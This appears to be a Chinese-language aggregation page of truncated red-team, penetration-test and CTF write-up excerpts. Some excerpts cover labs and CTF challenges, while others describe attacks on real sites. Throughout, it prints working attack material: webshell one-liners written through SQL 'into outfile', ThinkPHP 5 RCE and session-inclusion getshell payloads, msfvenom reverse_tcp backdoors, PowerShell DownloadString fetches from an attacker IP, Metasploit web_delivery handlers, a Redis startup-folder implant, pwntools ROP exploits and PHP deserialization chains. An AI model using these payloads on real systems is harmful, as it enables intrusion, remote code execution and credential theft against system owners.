红队攻击面相关讨论

关于Mysql蜜罐的具体技术细节，网上文章介绍的太多了，大家可以自己从网上搜索文章，我写一个简介吧：mysql中有一个load data local infile函数能够读取本地文件到mysql数据库中。当攻击者用爆破mysql密码的扫描器扫描到我们的mysql并连接上的时候（注，这里我纠正一下，只要连接一下蜜罐mysql，就可以被蜜罐读取到本地配置文件，不需要提供正确的用户名密码），客户端（攻击者）会自动发起一个查询，我们（服务端）会给与一个回应，我们在回应的数据包中加入load data local infile读取攻击者的本地文件到我们数据库中，达到反制的目的。（以下图片来源于网络搜索） cs的配置文件明文存储密码只要是使用cs客户端连接过cs服务端的电脑，cs客户端都会在固定的文件夹下生成一个.aggressor.prop配置文件。如果是Windows系统，那么文件位置是：C:\Users\Administrator\.aggressor.prop，这个配置文件里面就包含了cs远控的ip地址、端口、用户名及密码，而且都是明文的！如下图所示： 每次打开cs都会显示出曾经登录后的ip地址、端口、用户名、密码等信息，这些信息都是存储在本地.aggressor.prop文件中的，大致内容如下图所示： 因此我们得到结论，搭建一个mysql蜜罐，一旦攻击者连接这个蜜罐，那么这个蜜罐利用msyql本地文件读取漏洞去自动读取C:\Users\Administrator\.aggressor.prop这个文件内容，蜜罐就可以成功得到攻…

一、安装 fiddler 官网下载：https://www.telerik.com/download/fiddler 二、配置 打开fiddler tools-> options，genneral: 全选 https: connections: 配置代理地址 gateway: 三、打开电脑端小程序 退出微信，登录微信时设置代理 打开小程序 抓包成功 如果没成功 打开小程序、打开任务管理器，找到小程序进程，打开文件所在位置 退出微信，删除\WMPFRuntime 下所有文件，再次登录打开小程序就可以了 C:\Users\backlion\AppData\Roaming\Tencent\WeChat\XPlugin\Plugins\WMPFRuntime 。

0x00 前言最近在复现zabbix的漏洞（CVE-2022-23131），偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA（Zabbix Sia）公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞，该漏洞源于在启用 SAML SSO 身份验证（非默认）的情况下，恶意行为者可以修改会话数据，因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。 0x01 漏洞原因 在启用 SAML SSO 身份验证（非默认）的情况下，恶意攻击者可以修改会话数据来实现身份认证绕过。未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。 该漏洞存在于index_sso.php文件中，由于index_sso.php文件未调用CEncryptedCookieSession::checkSign()方法对cookie进行校验，且客户端的cookie可被伪造。 从index_sso.php文件中可以看出，当伪造的cookie中存在saml_data时，获取username_attribute的数据，如果该用户真实存在则会生成一个sessionid从而实现身份认证绕过 0x02 漏洞影响 5.4.8 5.0.18 4.0.36 0x03 漏洞复现fofa：app="ZABBIX-监控系统" && …

0x00 前言之前在打一个域环境的时候出现了域内主机不出网的情况，当时用的是cs的socks代理将不出网主机的流量代理到了边缘主机上。当时没有考虑太多，下来之后想到搭一个环境复现一下当时的情况，看有没有更简便的方法能够打下不出网的主机。 机缘巧合之下，发现了这个域环境还不错，再复现的过程中也有一些知识触及了我的知识盲区，也收获了许多新的知识。特地把过程记录下来，与想要学习打域内不出网主机的师傅们共同分享。 0x01 靶场地址分配内网网段：192.168.52.0/24 外网网段：192.168.10.0/24 攻击机： kali：192.168.10.11 靶场： win7(内)：192.168.52.143 win7(外)：192.168.10.15 域内主机： Winserver2003：192.168.52.141 Winserver2008：192.168.52.138 其中win7可以外网、内网通信，域内主机只能内网之间进行通信 一开始DCping不通win7，win7关闭防火墙之后可以ping通 打开C盘下的phpstudy目录打开web服务 0x02 web服务器渗透nmap探测端口 开了80端口，尝试访问web地址，发现为php探针 滑到最底部，发现网站底部有一个MySQL数据库连接检测 弱口令root/root连接成功 扫描后台我这里用的是御剑，但是好像很拉，因为在我打完这个靶场之后再去网上看的时候发现他们很多扫出来一个cms，通过cms也能拿shell，这里我就不演示怎么用cms弱口令进后台写shell…

1. 根据网卡获取的网段信息，对win7所在网段来一波存活主机检测，排除其他的之后目标锁定在主机号为128的主机上2. 对发现的存活主机来一波整体信息收集发现开了以下的端口，并且是一个域用户┌──(root💀kali)-[/]└─# nmap -A 192.168.164.128 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 09:53 CSTNmap scan report for 192.168.164.128Host is up (0.00052s latency).Not shown: 989 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45|_http-title: Site doesn't have a title (text/html).135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Wi…

0x01 前言Date/time：2015年，这次渗透测试中发现已经拿下的几台机器的管理员密码存在一定规律性，最终通过分析密码规律、组合新密码成功拿下目标整个C段机器权限，个人感觉这是个不错的内网通用/规律密码实战案例，所以想着还是记录一下吧。 0x02 Getshell过程网站基本信息探测： 目标站点：http://www.that****elos.com.br 服务器IP：189.**.**.204（巴西） 环境平台：ASP.NET 服务器系统：Windows这个网站禁止国内IP访问，所以只能上墙去做测试了，先用Chrome浏览器插件和指纹识别网站都未能得到服务器系统具体版本，不过根据个人经验猜测这应该是台Windows2003。 Chrome浏览器插件：Server Details 1.0.12、Wappalyzer 服务器系统识别：http://fuwuqixitongshibie.51240.com/?q= 网站后台地址：http://www.that****elos.com.br/admin/接着我们用Safe3WVS_v10.1漏洞扫描工具成功找到几处注入，并使用sqlmap工具验证这个注入点确实是存在的，并且已经跑出管理员的表和列，只不过在跑管理员用户密码时报错了。 跑表名： sqlmap -u "http://www.that****elos.com.br/detalhe_produto.asp?codProd=510" --tables [7 tables]：categorias，clientes，destaque…

0x00 实验目的拿到域环境下其他主机的网站源码 0x01 渗透思路通过拿到网站shell渗透到内网，由内网存活主机拿到域控权限，再由域控渗透到其他域里面得主机获取资源。 0x02 实验过程访问目标网站IP发现是一个静态网站，发现网站前台无法利用，尝试爆破一下网站后台 利用御剑扫描后台没有发现后台登录界面，但发现了robots.txt文件，查看robots.txt发现里面有网站后台目录 访问网站后台页面 尝试使用burp暴力破解，发现成功爆破出网站后台管理员账号密码为admin/passw0rd 利用爆破出来的管理员账号密码成功登录到网站后台（PS：登录的时候选择全功能登录） 发现在界面风格>模板选择处可以修改模板文件夹名，我们将模板文件夹名修改成1.asp，尝试利用IIS解析漏洞 然后在界面风格>编辑模板/css文件>添加模板处将aspx一句话木马添加成html文件 利用菜刀成功连接到我们写入的一句话木马 利用一句话木马上传一个aspx的大马上去，方便操作 查看发现该主机是双网卡，得到两个内网IP段 查看该主机缓存信息发现几个内网IP 查看发现192.168.152.173开启了1433端口，我们推测其可能是一台数据服务器 查看网站配置文件发现数据库账号密码 利用aspx大马成功登录到数据库，并且发现是system权限 查看域里所有用户名 查询域组名称 查看当前域中的计算机列表 查询域管理员 利用数据库shell添加一个账号，并将其加入到…

0x01 前言朋友发来一个站让帮看下提权，服务器上安装的有护卫神+火绒+安全狗等安全防护软件，看着确实挺唬人，他也试了不少常用提权EXP，结果都失败了，可能是欠缺免杀EXP能力吧，当然也有可能是修复了这些漏洞，抽空给他看了下并写了这篇记录文章。 在拿到权限后用中国菜刀连了下，不过好像被拦截了，提示：服务器返回无效或不可识别的响应，以前也多次遇到这种情况，这里只要换成Godzilla就能正常连接了。 0x02 服务器基本信息搜集虽然朋友在测试后给提供了些信息，但还是习惯自己去看下，因为每个人掌握的知识点和实战经验不一样，只有自己看了后才知道安装了哪些环境、WAF/AV和第三方软件，以及开放了哪些端口、打了多少补丁等，这样才能更好对其系统薄弱点进行测试。目标系统：Windows 2008 R2 (6.1 Build 7601, Service Pack 1).当前权限：iis apppool\*****.com支持脚本：ASP、ASPX、PHP，能够直接执行系统命令开放端口：21(ftp)、80(http)、135(rpc)、443(https)、445（smb）、801(http)、3306(mysql)、2121(G6FTP)、8021(G6FTP)、6588(hws)、58895(TermService)进程名称：G6FTPServer.exe、G6FTPTray.exe、HwsHostPanel.exe、mysqld.exe、php-cgi.exe、SafeDogUpdateCenter.exe、CloudHelper.exe、Sa…

0x01 渗透测试过程通过渗透网站拿到webshell，然后通过webshell拿到网站主机系统权限，发现受害主机有两张网卡，另一张网卡下有两台存活的内网主机，然后我们就尝试渗透存活的内网主机看能不能拿到系统权限，最后发现两台内网主机都开启了445端口，然后搜索了一下445端口漏洞发现有个最新的m17_010可能可以利用，结果真的通过ms17_010成功获得了内网主机的权限。 目标网站ip：192.168.31.196 浏览网站通过手工测试发现http://url/hr/hr.php?hrid=15处有注入点 尝试利用sqlmap工具跑一下这个注入点，看能不能注出有用的信息 通过测试发现这个注入点果然可以进行注入 然后利用该注入点进行尝试注出网站后台登录账号密码 发现跑出来的网站后台密码是用md5加密的，所以利用md5解密一下，发现只有两个权限较低的密码可以解密，而权限较高的admin账号解不开。不过问题不大，先用登录后台（后台登录界面可以用御剑跑出来）看一下 利用御剑跑出的后台目录里有个phpinfo页面，说不定可以得到一些有用的信息 发现可以得到网站文件的绝对路径 发现网站后台数据维护处可以执行sql语句，通过phpinfo页面知道了网站绝对路径，可以尝试在此处写入php一句话木马 select "<?php eval($_POST[123456]);?>" into outfile "/UPUPW_AP5.2/vhosts/jy.test.com/321.php" 发现可以执行成功 …

内网漫游拓扑图 利用登录绕过漏洞进行后台 目标网站ip：192.168.31.55，将目标网站ip绑定到本地hosts文件下的www.test.com下（防止直接访问ip网站加载不全），访问www.test.com得到网站首页，发现是一个html静态网站 经过点击发现该网站是FoosunCMS搭建的经过点击发现该网站是FoosunCMS搭建的 版本为v2.0，存在可以利用的漏洞，绕过管理员账号信息验证，直接进入后台，可谓是非常危险的一个利用漏洞，访问网站后台地址：/manage/Index.aspx 搜索发现FoosunCMS v2.0有一个登录绕过漏洞，尝试登录绕过，访问下面链接得到UserNumber http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin发现得将UserNumber加密后拼接成cookie即可成功登录 直接用sql注入拿到UserNumber，然后再与UserName等拼接，构造cookie直接以管理员权限登录，Exp代码如下： #coding:utf-8import argparseimport urllibimport tracebackimport base64from Crypto.Cipher import AESfrom binascii import b2a_hex…

0x00 简介 0x01 获得shellGetshell的过程没什么好说的，无非简单的后台弱口令到上传然后冰蝎连接getshell。 获得shell后，模拟终端ping 8.8.8.8有返回包，说明该服务器与外网互通。 既然跟外网互通，那么可以尝试直接使用msf的exploit/multi/handler配合冰蝎反弹shell来获得session use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost xxx.xxx.xxx.xxx set lport 5665 run 但是结果很不尽人意，没能够成功获得session。 在使用冰蝎模拟终端收集信息过程中，发现本地有powershell进程。 再次打开msf，本次尝试使用web_delivery配合终端执行powershell指令来获得session。 User exploit/multi/script/web_delivery Set targets 2 set payload windows/x64/meterpreter/reverse_https set lhost xxx.xxx.xxx.xxx set lport 4332 set srvport run 获得payload，使用冰蝎或者C刀模拟终端直接执行，成功获得session，执行getuid发现权限为system权限，省去了提权过程。 0x02 权限维持 我们使用ps查看当前进程，然后选中一个看起…

0x00 概述目标站点是http://www.example.com，官网提供了api使用文档，但是对其测试后没有发现漏洞，目录、端口扫描等都未发现可利用的点。后发现官网提供了客户端下载，遂对其进行一番测试。 0x01 信息收集先抓了下客户端的包，使用Fiddler和BurpSuite都抓不到，怀疑走的不是HTTP协议，用WireShark查看其确实用的是HTTP协议，但是数据包不好重放，这里最后使用了WSExplorer抓指定进程的包，成功抓取到通信的数据，抓到的数据如下，绿色的是请求包，红色的是响应包。 数据包又分为两部分，一个是请求行和请求头。 一个是请求正文。 拼接起来即可放到BurpSuite中进行数据包的重放 0x03 测试过程可看到请求包经过了加密再传输，返回的响应包也经过了加密。但是加解密总归是在客户端进行的，所以可从分析客户端入手。 使用Exeinfo PE查壳，可得知使用的是.NET框架 C#开发的程序。 可以使用dnspy，针对.NET程序的逆向工程工具，对客户端的加解密进行分析。打开后发现类及方法的命名都是无规律的数字字母，代码做了混淆。 混淆了的代码不利用阅读分析，可使用De4Dot尝试反混淆，支持很多种混淆加密工具混淆过的源码。 de4dot-x64.exe origin.exe 即可得到反混淆后的程序 origin-cleaned.exe 将反混淆后的程序拖入dnspy查看，可看到基本已还原，提高了可读性。 因为其通信采用的是HTTP协议，又发现有个类名为HttpHelper，跟进分析，代码…

0x01 简介本次测试为实战测试，测试环境是授权项目中的一部分，敏感信息内容已做打码处理，仅供讨论学习。请大家测试的时候，务必取得授权。 拿到授权项目的时候，客户只给我了一个公司名字，这里以某某公司代替。 0x02 信息搜集老办法，先是子域名扫描，然后目录扫描，发现了个鸡毛，啥利用点也没有，而且是云主机。进一步探测资产，欧力给，发现了CVE-2019-0708。targetr是windows server 2008 r2系统。 0x03 Getshell心想，发现了CVE-2019-0708，这样shell总稳了吧。这时迟那时快，拿出我的大保健msf，梭哈一波。卧槽，居然发现不能利用，探测到有漏洞，但是创建session失败。 不甘心，set target也没用，攻击了20多次，还是一样的错误，害苦了客户的靶机，跟着蓝屏20多次。 继续看，发现有redis资产，尝试弱口令看看，居然密码是123123，先查看一下信息： 这里利用有个难点，就是我们根本不知道网站的实际物理路径，尝试报错或者物理路径爆破，无果~~~，所以无法通过写一句话等形式拿下Webshell；这里也没有像linux一样的反弹利用；也没有计划任务可写。 经过前期的信息收集发现是windows server 2008 r2，我们可以写一个启动木马的脚本放到启动里面，然后利用CVE-2019-0708“强迫”主机重启。 说干就干，这里用powershell的cs马（请注意免杀，这里不讨论）。先设置redis的工作目录为windows的启动目录，然后写cs的马，最好记得务必s…

0x01 环境准备kali（模拟公网攻击机） Windows2008（靶机，装有360、火绒、安全狗、D盾） Powersploit（PowerShell攻击框架） https://github.com/PowerShellMafia/PowerSploit 0x02 尝试落地payload首先msfvenom生成exe后门程序 msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe lhost=192.168.192.119 lport=6666 -o ./6666.exePython3开启http下载服务 python3 -m http.servermsf开启监听 执行powershell命令时被火绒拦截 (New-Object Net.WebClient).DownloadString("http://192.168.192.119:8000/6666.exe") 0x03 PowerShell内存执行exe这也是现在红军非常流行的攻击手法，payload在内存中加载执行，也就是所谓的文件不落地，大致分以下几步 先将生成的payload在本地进行base64编码靶机执行远程下载命令靶机对payload进行解码并赋值给一个变量PowerShell远程加载Invoke-ReflectivePEInjection模块（PE反射注入）并执行payload本地编码payloadPowerShell下执行 function Convert-BinaryToString { …

0x00 前言在内网渗透的过程中思路才是最重要的，本次内网渗透的主机虽然不多，主要还是锻炼自己内网渗透的一个思想。 0x01 环境搭建靶场： win7(内)：192.168.138.136 win7(外)：192.168.10.25 域内主机： win2008：192.168.138.138 0x03 web服务器渗透nmap探测端口nmap -T4 -sC -sV 192.168.10.25 这里可以看到几个主要的端口，例如80、135、139、445，这里首先就可以想到可以利用的点有ipc、smb 开了80端口，尝试访问web地址，老笑脸人了，而且还是5.x版本，洞还是比较多 为了确定具体版本，这里先使用报错查看，发现这里的版本为5.0.22，如果没记错的话这里是有一个tp远程命令执行漏洞的 thinkphp getshell这里我首先在kali里面找一下有没有相关的漏洞 searchsploit thinkphp 可以看到这里有一个5.x远程执行漏洞，这里直接进入这个文件夹查看一下txt列出来的payload cd /usr/share/exploitdb/exploits/php/webapps cat 46150.txt 找到对应版本后fuzz以下payload，这个是列出数据库名字，这里看到数据库名为root 192.168.10.25/thinkphp/public/?s=.|think\config/get&name=database.username 这个payload应该是列出数据库密码，但是这里…

签到题目内容是一个 pdf 文件，用 Adobe Acrobat 打开，看到其中包含一些特殊符号。 在编辑模式下，查看得到其字体为 Wingdings，这是一个装饰字体，文本内容其实是 ASCII 码。文本范围是超出页面的，resize 之后复制出其内容，给出了两行文字： 这是栅栏密码，得到 flag 为 flag{Have_A_Great_Time@GeekGame_v1!}。 fa{aeAGetTm@ekaev! lgHv__ra_ieGeGm_1} 小北问答 Remake北京大学燕园校区有理科 1 号楼到理科 X 号楼，但没有理科 (X+1) 号及之后的楼。X 是？ 在 Google Earth 中搜索，存在理科 5 号楼，但没有理科 6 号楼。故答案为 5。 上一届（第零届）比赛的总注册人数有多少？ 在北京大学新闻网中找到报道北京大学举办首届信息安全综合能力竞赛，得到「本次大赛共有 407 人注册参赛」，故答案为 407。 geekgame.pku.edu.cn 的 HTTPS 证书曾有一次忘记续期了，发生过期的时间是？ 搜索「ssl cert database」，找到网站 crt.sh。在该网站上搜索 geekgame.pku.edu.cn，并根据题目给出的正则表达式寻找过期时间秒数以 3 结尾的证书，得到证书 4362003382。其过期时间为 Jul 11 00:49:53 2021 GMT，将时区换为 UTC+8，得到 2021-07-11T08:49:53+08:00。 2020 年 DEFCON CTF 资格赛签到题的…

0x00 Misc一、应该算是签到 二、Cthulhu Mythos 三、CyzCC_loves_LOL lovemath 0x01 Web一、EZ_TP <?php namespace think { class Request { protected $filter; protected $hook = []; protected $param = []; protected $config = []; public function __construct() { $this->filter = 'system'; $this->param = ['cat /*']; $this->hook = ['visible' => [$this, 'isAjax']]; $this->config = ['var_ajax' => '']; } } abstract class Model { private $data = []; protected $append = []; function __construct() { $thi…

WebHackMe开局一个文件上传，utf-16的编码绕过，然后根据提示爆破文件名 爆破最后四位 0000 - 9999， 就可以访问到了，注意是12小时。 PwnbabyropDEBUG # _*_ coding:utf-8 _*_ from pwn import * import numpy as np context.log_level = 'debug' #context.terminal=['tmux', 'splitw', '-h'] prog = './babyrop' #elf = ELF(prog) p = process(prog)#,env={"LD_PRELOAD":"./libc-2.27.so"}) libc = ELF("./libc-2.27.so") #p = remote("123.57.207.81",44823) def debug(addr,PIE=False): debug_str = "" if PIE: text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16) for i in addr: debug_str+='b *{}\n'.format(hex(text_base+i)) gdb.attach(p,debug_str) else: for i in…

CryptoVigenere在https://www.boxentriq.com/code-breaking/vigenere-cipher 网站爆破得到为key:asterism 解密得到falg。 或者 根据题目Vigenere可看出是维吉尼亚密码 使用在线解码工具破解 https://guballa.de/vigenere-solver flag：flag{53d613fc-6c5c-4dd6-b3ce-8bc867c6f648} PWNsupercall简单栈溢出，利用LibcSearcher通过题目泄露出的_IO_2_1_stdin_的真实地址找到 libc 基地址，用one_gatget 来get shell。 #!/usr/bin/env python # -*- encoding: utf-8 -*- ''' @File : exp.py @Time : 2021/11/27 13:39:07 @Author : lexsd6 ''' from pwn import * from libcfind import * local_mote=0 elf='./supercall' e=ELF(elf) #context.log_level = 'debug' context.arch=e.arch ip_port=['123.57.207.81',16985] debug=lambda : gdb.attach(p) if local_mote==1 else None …

WebX1cT34m_API_System 考点：Springboot actuator配置不当导致的API安全问题 访问/actuator/mappings，可以看到有/actuator/jolokia(限制了本地IP，直接访问返回403)和一个隐藏的API接口/user/list。 或者可以直接拿APIKit扫到/user/list： POST访问/user/list，返回XML格式的数据 那么自然而然地想到了XXE；加了waf，不让直接读文件； (这里有俩师傅做了非预期,XXE的waf没写好,可以直接盲打外带flag,我在v2限制了靶机出网无法外带了) 但是众所周知，XXE是可以SSRF的； 那么SSRF配合/actuator/jolokia可以完成一次利用 因为是docker代理的端口，我们需要先访问/actuator/env获取本地服务端口： 然后构造SSRF： 因为/jolokia/list返回的数据太长了，而且里面有一些特殊符号会报XML document structures must start and end within the same entity.。 于是后面给了附件pom.xml，可以本地起起来看一下有什么Mbean。 有一个可以读写文件的Mbean： com.sun.management:type=DiagnosticCommand 判断远程环境是否存在这个Mbean： 如果不存在返回的是上图，如果存在返回的是下图两种情况 exp: POST /user/list HTTP/1.1 Host: localh…

WEBmmmmd5d5d5d5链接打开页面 绕过 ?a[]=1&b[]=2 构造md5 <?php for($i = 0 ; $i <= 100000 ; $i ++) { if (substr(md5($i) , 5, 5) === "3ddc6") { echo $i; break; } } ?> 进入到下一层 提交 ffifdyop 得到： <?php error_reporting(0); include "flag.php"; highlight_file(__FILE__); if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){ echo $flag; } 构造payload： param1[]=1&param2[]=2 即可得到flag EDGnb(签到)直接docker桌面版打开 即可得到flag 时光塔的宝藏链接打开一个login框 构造payload： pswd=admin&usname=admin' union select 1,"<?php eval($_POST[1]);?>" into outfile '/var/www/html/1203.php';# 蚁剑连1203.php，密码为1，即可得到flag LFI_to_RCE<?php show_source(…

Web1.Checkin解题思路 这道题 前面根据 源码应该是 nosql注入，我分析的payload：username='||1) {return true;}})//&password=123456 盲注得admin/54a83850073b0f4c6862d5a1d48ea84fimport time import requests import string session = requests.session() chars = string.printable password = '' burp0_url = "http://d8304b2c-689b-4b9f-844a-1c3358bb57de.node4.buuoj.cn:81/login" burp0_headers = {"Cache-Control": "max-age=0", "Origin": "http://d8304b2c-689b-4b9f-844a-1c3358bb57de.node4.buuoj.cn:81", "Upgrade-Insecure-Requests": "1", "DNT": "1", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Sa…

Webeasywill解题思路 变量覆盖 http://eci-2zej1goyn9jh8hty6ton.cloudeci1.ichunqiu.com/?name=cfile&value=/etc/passwd P神博客最近的文章利用pearcmd：https://tttang.com/archive/1312/ Pentest in Autumn解题思路 http://eci-2ze40jm526y24nv2lkl3.cloudeci1.ichunqiu.com:8888/ 权限绕过 /;/actuator/env /;/actuator/heapdump 解密脚本 import base64 import struct print(base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb', -126,-67,24,-71,-62,-122,61,-52,91,77,-110,115,-43,100,-88,103))) #gr0YucKGPcxbTZJz1WSoZw== flag{3fa31850-8ee6-40f2-9b18-9ecf6cac176c} ReverseHideit解题思路 打开之后发现有SMC，单步调试总是找不到主函数 发现输出字符串，在puts下断点，第二次断下后回溯到主函数处，向上一直到函数头，反编译 __int64 __fastcall sub_24D61161BB0(__int64 a1) { //... if ( !(unsigned in…

最近接到任务，调查一个诈骗团伙 上面有一个注册接口，直接先注册一个用户看看他们怎么诈骗的 好家伙，用户赚了8个亿，充值过的用户直呼内行。 这种站点一看就是那种诈骗团伙的杀猪盘，使用的那种tp5的框架一键搭建，方便又省事。后来根据报错信息的确是tp5.0.10的框架还开了debug模式，老杀猪盘了。 直接先用tp5rce打出phpinfo看 s=captcha _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo 看来禁的函数比较多，这个时候用tp5的rce和写shell就比较困难，使用tp5日志包含和session包含来getshell就十分的方便。 日志包含还需要去找文件，我这里就直接是session包含来getshell 先通过设置session会话并传入一句话木马 ?s=captcha _method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1 然后直接利用文件包含去包含session文件，tp5的session文件一般都是在/tmp下面，文件名为sess_sessionid ?s=captcha _method=__construct&method=get&filter[]=think\__include_file&…

Web 1.esay_eval<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a->a(); } } if(isset($_REQUEST['poc'])){ preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret); if (isset($ret[1])) { foreach ($ret[1] as $i) { if(intval($i)!==1){ exit("you want to bypass wakeup ? no !"); } } unserialize($_REQUEST['poc']); } }else{ highlight_file(__F…